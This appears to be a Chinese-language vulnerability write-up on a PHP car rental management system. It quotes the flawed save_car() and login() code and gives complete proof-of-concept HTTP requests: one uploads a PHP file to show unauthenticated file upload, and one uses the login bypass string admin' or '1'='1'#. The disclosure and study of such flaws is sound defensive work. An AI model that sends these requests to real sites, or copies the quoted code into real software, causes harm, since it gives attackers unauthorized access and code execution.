Car Rental Management System待审记录
前言
一个比较简单的国外的车辆信息发布管理系统,看到有人还提了CVE就简单的看了下。记录下存在的两类洞sql注入和未授权文件上传,其中sql注入存在多处以下只记录了一处。
一、未授权文件上传
代码漏洞位置:
\admin\admin_class.php ,第282-309行save_car()函数,如下所示:
function save_car(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($k, array('id','img','description')) && !is_numeric($k)){
if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
$data .= ", description = '".htmlentities(str_replace("'","’",$description))."' ";
if($_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$fname = str_replace(" ", '', $fname);
$move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/cars_img/'. $fname);
$data .= ", img_path = '$fname' ";
}
if(empty($id)){
$save = $this->db->query("INSERT INTO cars set $data");
}else{
$save = $this->db->query("UPDATE cars set $data where id = $id");
}
if($save)
return 1;
}
如上代码所示,直接将前端传入的文件数据进行保存并没有对文件内容做校验,然后用时间+_原文件名生成新的文件名进行存储至admin/assets/uploads/cars_img目录下:
漏洞复现:
POST /admin/ajax.php?action=save_car HTTP/1.1
Host: 192.168.254.1
Content-Length: 1081
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX98edFXJqWpvI5cf
Origin: http://192.168.254.1
Referer: http://192.168.254.1/admin/index.php?page=manage_car
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="brand"
111
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="model"
111
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="category_id"
5
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="engine_id"
3
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="transmission_id"
3
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="description"
111111111
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="price"
10
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="qty"
10
------WebKitFormBoundaryX98edFXJqWpvI5cf
Content-Disposition: form-data; name="img"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryX98edFXJqWpvI5cf--发送上述POC数据包,返回1表示上传成功:
可在网站首页找到上传图片马的位置,如下所示:
访问即可看到相应的phpinfo界面
二、注册处sql注入
代码位置:
admin\admin_class.php, 第18-38行 login()函数如下所示:
function login(){
extract($_POST);
$qry = $this->db->query("SELECT * FROM users where username = '".$username."' and password = '".md5($password)."' ");
if($qry->num_rows >0){
foreach ($qry->fetch_array() as $key => $value) {
if($key != 'passwors' && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
if($_SESSION['login_type'] != 1){
foreach ($_SESSION as $key => $value) {
unset($_SESSION[$key]);
}
return 2 ;
exit;
}
return 1;
}else{
return 3;
}
}
直接将前端传入的username拼接入sql语句拼接入sql语句中造成sql注入。当返回1时表示登陆成功。
漏洞复现:
POST /admin/ajax.php?action=login HTTP/1.1
Host: 192.168.254.1
Content-Length: 42
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.254.1
Referer: http://192.168.254.1/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=calieaq0hnnh4g9dsf4agr7eh3
Connection: close
username=admin' or '1'='1'#&password=123456在登陆口用户名输入处输入admin' or '1'='1'#,成功登陆
源码地址
转载
分享
发布投稿
没有评论